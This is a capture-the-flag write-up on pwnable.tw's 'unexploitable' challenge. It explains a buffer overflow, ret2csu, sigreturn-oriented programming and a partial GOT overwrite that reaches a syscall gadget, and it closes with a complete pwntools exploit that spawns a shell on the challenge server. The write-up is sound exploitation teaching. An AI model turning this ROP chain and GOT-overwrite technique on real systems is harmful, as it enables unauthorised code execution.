Pwnable.tw: Unexploitable
unexploitable [500 pts]
The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.
nc chall.pwnable.tw 10403
Initial Analysis
By running checksec
, we can view the protections and memory corruption mitigations
enabled on this binary.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
As we can see, the only protection enable is NX, which means the stack is non executable.
Let’s decompile the binary and take a look at it’s insides.
The binary is very simple, it will simply sleep for 3 seconds then read 256 bytes into a 16 byte buffer. The vulnerability is an obvious buffer overflow, and without a stack canary we can hijack program control without any leaks.
As this is a 500 point challenge, the binary seemed deceptively simple. First and foremost, we aren’t given a lot to work with here. At a first glance, there doesnt seem to be any way in which we can spawn a shell given such little to work with.
Exploitation
There are two solutions that I found to this challenge, each revolving around a similar concept.
We need some means of controlling the current execution context, particularly the registers in
order to gain the ability to spawn a shell via execve()
.
The first solution involves the technique ret2csu, in which we utilize the gadgets present
in __libc_csu_init()
to gain control of the necessary registers to spawn a shell. Keep in
mind that this technique no longer works in newer versions of glibc due to the fact that
the function was moved into libc in glibc 2.34 under the symbol call_init
. This patch
removed the gadgets from the binary which were required to perform this technique.
The second solution utilizes sigreturn oriented programming; which exploits the signal handling mechanism to forge a fake signal frame. This signal frame stores the execution context of the running process which was stored on the user space stack in order to execute the signal handler. A more in-depth explanation of the technique is detailed within the sigreturn oriented programming post.
Our next problem is the fact that we dont have a syscall
gadget, nor do we have any obvious
means of controlling the rax
register to contain our desired value of 59 (execve).
In the x86_64 ABI, the ax
register (and its extended forms) serves multiple use cases. One
of those being the fact that it contains the return value for each executed routine. If we can
hijack program control, then we can populate the rax
register with whatever value we want
simply by manipulating this functionality.
The following is a snippet from the man page for the read
system call.
RETURN VALUE
Upon successful completion, these functions shall return a non-negative
integer indicating the number of bytes actually read. Otherwise, the
functions shall return -1 and set errno to indicate the error.
By leveraging the read
import, we can gain control of the rax
register.
We also need a reference to whichever binary we want to execute, which in this case
is /bin/sh\x00
. This can be achieved simply by reading the string into a writeable
section of memory and passing that reference to execve.
Our last problem is that of the syscall
gadget, as one isn’t present within the binary.
However, something that we can notice is the fact that Full RELRO
is not enabled, which
means the global offset table is writeable. Despite ASLR
being enabled, memory pages
are always aligned to 0x1000
; meaning that the three least significant nibbles will
always be fixed.
Due to the fact that the addresses of various imported symbols are populated dynamically
at runtime lazily, we can overwrite an entry within the GOT to point to whatever instruction
relative to the symbol in libc. Let’s take a look at the surrounding instructions in the libc
provided to us and see if we can find a syscall
instruction. I chose to use the sleep
import to overwrite.
To do so, we can search all the instructions in which we can reliably overwrite, first we find the address of sleep within libc.
[0x000cb680]> pd 1 @sym.sleep
; CALL XREF from sym.argp_error @ +0x205(x)
; CALL XREF from sym.rcmd_af @ 0x11d49b(x)
; CALL XREF from sym.rexec_af @ 0x11e124(x)
┌ 68: int sym.sleep (int s);
│ rg: 1 (vars 0, args 1)
│ bp: 0 (vars 0, args 0)
│ sp: 1 (vars 1, args 0)
│ 0x000cb680 55 push rbp
[0x000cb680]>
So we now know that we can reliably overwrite to any instruction within the range
0x000cb000-0x000cbfff
. By searching for instructions within this range, I chose the
syscall
gadget at the address 0x000cb655
. So by overwriting the least significant
byte of the sleep GOT entry with \x55
, we effectively gain the ability to invoke
system calls.
Keep in mind, when debugging this locally if you are not loading the binary with the
provided libc you will have to update the offset to point to syscall
for whichever
libc you are using.
I chose to use the ret2csu
technique, the full exploit code is provided down below.
#!/usr/bin/env python3
from pwn import *
from sys import argv
from time import sleep
binary = ELF('unexploitable', checksec=0)
libc = ELF('libc_64.so.6', checksec=0)
context.arch='amd64'
context.log_level='DEBUG'
r=False
if len(argv) >= 2 and argv[1] == '-r':
r=True
p = remote('chall.pwnable.tw', 10403)
else:
p = binary.process(env={})
s = lambda x, r="" : \
p.sendafter(r, x) if r else p.send(x)
sl = lambda x, r="" : \
p.sendlineafter(r, x) if r else p.sendline(x)
csu_gadget_1 = 0x004005e6
csu_gadget_2 = 0x004005d0
csu_chain = lambda f, a1=0, a2=0, a3=0 : \
flat(csu_gadget_1, 0, 0, 1, f, a1, a2, a3, csu_gadget_2) + p64(0)*7
offset=24
bss_section=0x00601028
pause()
payload = b'A'*offset # overwrite base pointer
payload += csu_chain(binary.got['read'], 0, bss_section, 1024)
payload += p64(0x0000000000400512) # pop rbp ; ret
payload += p64(bss_section)
payload += p64(0x0000000000400576) # leave ; ret
log.info("sleep(3)")
sleep(3)
log.info("Sending payload 1")
p.send(payload)
payload2 = b'/bin/sh\x00' # overwrite base with bin sh string
payload2 += csu_chain(binary.got['read'], 0, binary.got['sleep'], 1)
payload2 += csu_chain(binary.got['sleep'], 1, bss_section, 59)
payload2 += csu_chain(binary.got['sleep'], bss_section, 0, 0)
p.send(payload2)
sleep(1)
p.sendline(b'\x55' if r else b'\xb9')
p.interactive()
Conclusion
Something to keep in mind is the fact that the initial read within main
only allows us
to read 0x100
bytes into the local buffer. In my case in using ret2csu
it was very
easy to craft rop chains which are larger than this read. We can circumvent this with
a stack pivot to any read/write region of known memory; I chose to use the .bss
section.
Thanks for reading \(≧▽≦)/ !!